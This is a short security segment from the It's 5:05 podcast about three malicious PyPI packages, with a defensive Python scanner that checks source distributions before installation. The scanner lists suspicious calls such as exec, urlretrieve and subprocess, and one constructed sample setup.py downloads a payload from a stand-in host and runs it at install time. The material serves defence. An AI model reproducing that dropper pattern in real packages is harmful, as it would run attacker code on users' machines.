Malicious Python packages designed to steal information from developers' systems were recently discovered by Fortinet. The packages were uploaded to the Python Package Index (PyPI) between January 7 and 12 this year by an author named lolipop, under the names colorslib, httpslib and libhttps. All three have been reported and removed from the index. PyPI is the most widely used repository for Python packages and, unfortunately, it has seen a surge in malicious uploads. The index does not have the resources to scrutinise every package that is uploaded and relies heavily on user reports to find and remove bad ones; often, by the time a package is reported, it has already been downloaded several hundred times. This is an important reminder not to blindly trust packages downloaded from the internet. We need to do our own due diligence and verify that a package's contents are safe and trustworthy before we install it.
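
What that due diligence can look like in practice, as an added example that is not part of this segment or of Fortinet's report: a small Python scanner that inspects a source distribution (sdist) before it is installed. The point is that `pip install` executes setup.py with your privileges, so an install-time dropper runs before the package is ever imported. The indicator list, the package names (goodlib, badlib), the URL and the two sample archives are all constructed for this example; they illustrate a common dropper pattern in general and are not claims about what the three packages named above actually did.

```python
"""Inspect a Python sdist before installing it (added example, constructed data).

`pip install` runs setup.py (and any build hooks) as you, so an install-time
dropper executes before the package is imported. Get the archive without
running it, then look at what it would do. The indicators below are heuristics
chosen for this example, not an official or exhaustive PyPI check.
"""
import ast
import io
import tarfile

# Dotted callee name -> why it deserves a look in package code.
SUSPICIOUS_CALLS = {
    "exec": "dynamic code execution",
    "eval": "dynamic code execution",
    "base64.b64decode": "decoding an embedded blob",
    "urllib.request.urlopen": "network fetch at install time",
    "urllib.request.urlretrieve": "network fetch at install time",
    "requests.get": "network fetch at install time",
    "subprocess.Popen": "spawning a process",
    "subprocess.run": "spawning a process",
    "subprocess.call": "spawning a process",
    "os.system": "spawning a process",
    "os.startfile": "launching a downloaded file",
}
LONG_LITERAL = 200  # a string literal this long is often an encoded payload


def _callee_name(call):
    """Dotted name of a Call's callee ('urllib.request.urlopen'), or None."""
    parts = []
    node = call.func
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None  # callee is a subscript, lambda, etc.


def scan_source(path, source):
    """Scan one Python file's text. Returns [(path, lineno, reason), ...]."""
    try:
        tree = ast.parse(source)
    except (SyntaxError, ValueError) as exc:
        # Code that will not parse is itself a red flag (packed/obfuscated).
        return [(path, getattr(exc, "lineno", 0) or 0, "unparseable Python (obfuscation?)")]
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _callee_name(node)
            if name in SUSPICIOUS_CALLS:
                findings.append((path, node.lineno, f"{name}: {SUSPICIOUS_CALLS[name]}"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if len(node.value) >= LONG_LITERAL:
                findings.append((path, node.lineno, f"string literal of {len(node.value)} chars"))
    return findings


def scan_sdist(archive_bytes):
    """Scan every .py file in an sdist tarball given as bytes.

    setup.py runs at install time, so hits there are tagged INSTALL-TIME;
    hits elsewhere run on import, which is still bad but one step later.
    """
    findings = []
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r:*") as tar:
        for member in tar.getmembers():
            if not (member.isfile() and member.name.endswith(".py")):
                continue
            source = tar.extractfile(member).read().decode("utf-8", errors="replace")
            tag = "INSTALL-TIME " if member.name.rsplit("/", 1)[-1] == "setup.py" else ""
            for path, lineno, reason in scan_source(member.name, source):
                findings.append((path, lineno, tag + reason))
    return sorted(findings)


def build_sdist(files):
    """Build a .tar.gz in memory from {path: source}; used only for the samples."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, text in files.items():
            data = text.encode()
            info = tarfile.TarInfo(path)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


# Constructed samples (names and URL are made up). The second mimics a typical
# install-time dropper: setup.py fetches a binary and runs it before setup().
BENIGN_SDIST = build_sdist({
    "goodlib-1.0/setup.py": "from setuptools import setup\nsetup(name='goodlib', version='1.0')\n",
    "goodlib-1.0/goodlib/__init__.py": "def add(a, b):\n    return a + b\n",
})
DROPPER_SDIST = build_sdist({
    "badlib-1.0/setup.py": (
        "import os, subprocess, urllib.request\n"
        "from setuptools import setup\n"
        "url = 'http://example.invalid/payload.exe'\n"
        "path = os.path.join(os.environ.get('TEMP', '/tmp'), 'payload.exe')\n"
        "urllib.request.urlretrieve(url, path)\n"
        "subprocess.Popen([path])\n"
        "setup(name='badlib', version='1.0')\n"
    ),
})

if __name__ == "__main__":
    for label, blob in (("goodlib", BENIGN_SDIST), ("badlib", DROPPER_SDIST)):
        hits = scan_sdist(blob)
        print(f"{label}: {'clean by these heuristics' if not hits else ''}")
        for path, lineno, reason in hits:
            print(f"  {path}:{lineno}: {reason}")
```

Two caveats when using something like this on a real package. First, obtain the archive without letting anything execute it: for a wheel, `pip download --no-deps --only-binary :all: <name>` is safe because wheel metadata is static, but for an sdist pip may run setup.py just to read its metadata, so fetch the sdist file directly from its PyPI files URL instead and scan the bytes you downloaded (a wheel is a zip, so the same scan applies to its .py members via `zipfile`). Second, these heuristics are a first look, not a verdict: attackers split strings, go through `getattr`, or hide the payload in a dependency, so a clean result means "nothing obvious", after which pinning the reviewed version with `pip install --require-hashes` keeps a later upload from silently replacing what you checked.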

This segment was created for the It’s 5:05 podcast